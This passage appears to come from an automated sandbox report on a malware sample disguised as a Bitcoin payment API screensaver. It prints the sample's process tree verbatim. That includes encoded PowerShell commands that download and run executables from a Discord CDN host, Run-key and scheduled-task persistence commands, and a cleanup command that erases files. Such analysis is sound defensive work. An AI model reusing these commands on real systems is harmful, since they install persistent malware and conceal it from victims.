PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2488 wrote to memory of 1776	2488	cmd.exe	schtasks.exe
PID 2488 wrote to memory of 1776	2488	cmd.exe	schtasks.exe
PID 2488 wrote to memory of 1776	2488	cmd.exe	schtasks.exe
PID 4032 wrote to memory of 1512	4032	RegAsm.exe	DEFENDERRUNTIME.EXE
PID 4032 wrote to memory of 1512	4032	RegAsm.exe	DEFENDERRUNTIME.EXE
PID 4032 wrote to memory of 60	4032	RegAsm.exe	WINDOWSPROTECT.EXE
PID 4032 wrote to memory of 60	4032	RegAsm.exe	WINDOWSPROTECT.EXE
PID 4032 wrote to memory of 536	4032	RegAsm.exe	FILEMANAGE.EXE
PID 4032 wrote to memory of 536	4032	RegAsm.exe	FILEMANAGE.EXE
PID 4032 wrote to memory of 976	4032	RegAsm.exe	FILEMANAGER.EXE
PID 4032 wrote to memory of 976	4032	RegAsm.exe	FILEMANAGER.EXE
PID 4032 wrote to memory of 1212	4032	RegAsm.exe	REDLINESECURITY.EXE
PID 4032 wrote to memory of 1212	4032	RegAsm.exe	REDLINESECURITY.EXE
PID 1512 wrote to memory of 3620	1512	DEFENDERRUNTIME.EXE	powershell.exe
PID 1512 wrote to memory of 3620	1512	DEFENDERRUNTIME.EXE	powershell.exe
PID 60 wrote to memory of 1296	60	WINDOWSPROTECT.EXE	powershell.exe
PID 60 wrote to memory of 1296	60	WINDOWSPROTECT.EXE	powershell.exe
PID 4032 wrote to memory of 4864	4032	RegAsm.exe	REDLINESECURTY.EXE
PID 4032 wrote to memory of 4864	4032	RegAsm.exe	REDLINESECURTY.EXE
PID 4032 wrote to memory of 2484	4032	RegAsm.exe	powershell.exe
PID 4032 wrote to memory of 2484	4032	RegAsm.exe	powershell.exe
PID 4032 wrote to memory of 3608	4032	RegAsm.exe	SECURITYHEALTHSERVICE.EXE
PID 4032 wrote to memory of 3608	4032	RegAsm.exe	SECURITYHEALTHSERVICE.EXE
PID 976 wrote to memory of 2144	976	FILEMANAGER.EXE	powershell.exe
PID 976 wrote to memory of 2144	976	FILEMANAGER.EXE	powershell.exe
PID 536 wrote to memory of 2212	536	FILEMANAGE.EXE	powershell.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

4064 attrib.exe
5340 attrib.exe

pid	process
4064	attrib.exe
5340	attrib.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/RcsMonster/Bitecoin-Payment-Get-Api/blob/main/Bitecoin%20Api%20Payment%20Pay/GoUrl/BitecoinPaymentApi%E2%80%AEnls..scr
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3744

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3744 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:864

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\26HZJLHZ\BitecoinPaymentApi‮nls.scr
"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\26HZJLHZ\BitecoinPaymentApi‮nls.scr" /S
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1304

C:\Users\Admin\AppData\Roaming\WINDOWSHELLHOSTT.EXE
"C:\Users\Admin\AppData\Roaming\WINDOWSHELLHOSTT.EXE"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value '"C:\Users\Admin\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe"' -PropertyType 'String'
5⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\Admin\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
5⤵
- Suspicious use of WriteProcessMemory
PID:2488

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \WIndowShellHost /tr "C:\Users\Admin\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
5⤵
PID:2308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4032

C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIME.EXE
"C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIME.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA4ADkAOAA4ADcAMgA2ADgAOAA2ADgAMAAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwB4AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABlAGYAZQBuAGQAZQByAFIAdQBuAHQAaQBtAGUALgBlAHgAZQAnACkAKQA8ACMAbQBqAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwApADwAIwB0AGcAeAAjAD4A"
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3620

C:\Users\Admin\AppData\Roaming\DefenderRuntime.exe
"C:\Users\Admin\AppData\Roaming\DefenderRuntime.exe"
8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4176

C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIMEE.EXE
"C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIMEE.EXE"
6⤵
PID:60

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA3ADkAMwA3ADkAMgA4ADAAMgA5ADMANgAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAGUALgBlAHgAZQAnACwAIAA8ACMAaABhAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAGIAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHAAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApACkAPAAjAGcAcwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApADwAIwBwAG4AeAAjAD4A"
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Users\Admin\AppData\Roaming\DefenderRuntimee.exe
"C:\Users\Admin\AppData\Roaming\DefenderRuntimee.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
9⤵
PID:3636

C:\Users\Admin\AppData\Roaming\FILEMANAGE.EXE
"C:\Users\Admin\AppData\Roaming\FILEMANAGE.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAagB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADEAOAA5ADYAMAAyADYANQAyADIAMgAxAC8ARgBpAGwAZQBNAGEAbgBhAGcAZQAuAGUAeABlACcALAAgADwAIwBpAG4AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAeQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAPAAjAGsAdwBqACMAPgA="
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Users\Admin\AppData\Roaming\FileManage.exe
"C:\Users\Admin\AppData\Roaming\FileManage.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4048

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
9⤵
PID:5324

C:\Users\Admin\AppData\Roaming\FILEMANAGER.EXE
"C:\Users\Admin\AppData\Roaming\FILEMANAGER.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcgBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA4ADkANQAyADAAMAAyADUAMQA5ADkANgAvAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwB0AG0AdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AcgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAagBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcAKQApADwAIwBmAHIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAHIAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBzAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQBNAGEAbgBhAGcAZQByAC4AZQB4AGUAJwApADwAIwBnAHYAbAAjAD4A"
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Users\Admin\AppData\Roaming\FileManager.exe
"C:\Users\Admin\AppData\Roaming\FileManager.exe"
8⤵
- Executes dropped EXE
PID:5672

C:\Users\Admin\AppData\Roaming\REDLINESECURITY.EXE
"C:\Users\Admin\AppData\Roaming\REDLINESECURITY.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:1212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADYANgA2ADUANgA4ADEAMwAxADgANgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwAsACAAPAAjAHcAagBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBoAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAaQB0AHkALgBlAHgAZQAnACkAKQA8ACMAdAB1AHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABnAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwApADwAIwB1AGIAYwAjAD4A"
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656

C:\Users\Admin\AppData\Roaming\RedlinESecurity.exe
"C:\Users\Admin\AppData\Roaming\RedlinESecurity.exe"
8⤵
- Executes dropped EXE
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3128 -s 780
9⤵
- Program crash
PID:4076

C:\Users\Admin\AppData\Roaming\REDLINESECURTY.EXE
"C:\Users\Admin\AppData\Roaming\REDLINESECURTY.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAaQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADEAMwA4ADEANgA5ADgAMwA2ADQAMgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcALAAgADwAIwByAGwAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAbQBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAdgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQApADwAIwBjAGsAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGQAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAdAB5AC4AZQB4AGUAJwApADwAIwBmAHUAcgAjAD4A"
7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Users\Admin\AppData\Roaming\RedlinESecurty.exe
"C:\Users\Admin\AppData\Roaming\RedlinESecurty.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RedlinESecurty';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RedlinESecurty' -Value '"C:\Users\Admin\AppData\Roaming\RedlinESecurty\RedlinESecurty.exe"' -PropertyType 'String'
9⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \RedlinESecurty /tr "C:\Users\Admin\AppData\Roaming\RedlinESecurty\RedlinESecurty.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
9⤵
PID:1240

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \RedlinESecurty /tr "C:\Users\Admin\AppData\Roaming\RedlinESecurty\RedlinESecurty.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
- Creates scheduled task(s)
PID:620

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
9⤵
PID:2832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Users\Admin\AppData\Roaming\SECURITYHOST.EXE
"C:\Users\Admin\AppData\Roaming\SECURITYHOST.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:3676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADMANQA5ADkANAAxADcAMgAyADEANgAyAC8AUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACwAIAA8ACMAZABnAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHAAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGYAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABvAHMAdAAuAGUAeABlACcAKQApADwAIwB2AGgAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABwAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAbwBzAHQALgBlAHgAZQAnACkAPAAjAHUAYgBoACMAPgA="
7⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Users\Admin\AppData\Roaming\SecurityHost.exe
"C:\Users\Admin\AppData\Roaming\SecurityHost.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHost' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHost\SecurityHost.exe"' -PropertyType 'String'
9⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5580

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHost /tr "C:\Users\Admin\AppData\Roaming\SecurityHost\SecurityHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
9⤵
PID:4900

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHost /tr "C:\Users\Admin\AppData\Roaming\SecurityHost\SecurityHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
10⤵
- Creates scheduled task(s)
PID:2348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
9⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:6136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 6136 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe & RD /S /Q C:\\ProgramData\\139228722667881\\* & exit
10⤵
PID:1680

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 6136
11⤵
- Kills process with taskkill
PID:4936

C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE
"C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:3380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAbABiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADkAMgAxADUAOQA0ADAAOAAxADcAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB4AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAC4AZQB4AGUAJwApACkAPAAjAHoAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AaQBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAH